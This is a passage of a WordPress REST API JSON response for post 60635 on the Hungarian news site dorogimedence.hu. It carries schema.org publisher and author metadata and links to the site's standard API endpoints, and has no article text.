H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/60635","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=60635"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/60635\/revisions"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=60635"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=60635"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=60635"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}